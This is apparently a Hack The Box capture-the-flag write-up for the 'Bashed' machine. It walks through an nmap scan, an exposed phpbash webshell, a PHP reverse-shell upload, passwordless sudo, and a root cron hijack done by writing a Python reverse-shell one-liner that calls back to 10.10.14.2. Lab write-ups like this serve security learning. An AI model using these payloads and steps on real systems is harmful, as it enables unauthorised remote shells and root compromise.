Bashed — HTB
Nmap Scan
nmap -A -T4 10.10.10.68 -oN Bashed -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-26 20:15 EDT
Nmap scan report for 10.10.10.68
Host is up (0.19s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.18 secondsAs from the nmap results we can see there is only one port open and it’s running Apache httpd 2.4.18 (Ubuntu) Let’s enumerate the webserver.
The server is running a phpbash now let’s enumerate the directories.
Found some interesting directories
/uploads
/dev
We got a webshell exposed, But it’s not the persistent one, I have tried reverse shells but not worked but as I enumerated earlier there is a upload directory too so we will transfer our php reverse shell on the machine. Now on your kali machine copy the php reverse shell from /usr/share/webshells/php and modify the IP and port. Then set up and Python server and transfer it to the targeted box.
File has been uploaded now setup and listener and execute the file to get the reverse shell.
Start with LinEnum.sh to get info about privesc. This section stands out:
www-data can sudo as scriptmanager:
We can sudo without supplying a password!
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALLEasy to get a shell as scriptmanager: sudo -u scriptmanager /bin/bashNow scriptmanager has access to a folder that www-data could not access:
Most interesting is that the test.txt file is owned by root, and seems to be the result of the test.py script, which is writable by scriptmanager.
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.2\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > test.pyAs expected, there’s a cron that’s running scripts from the /scripts directory as root.
Thank you for reading :)
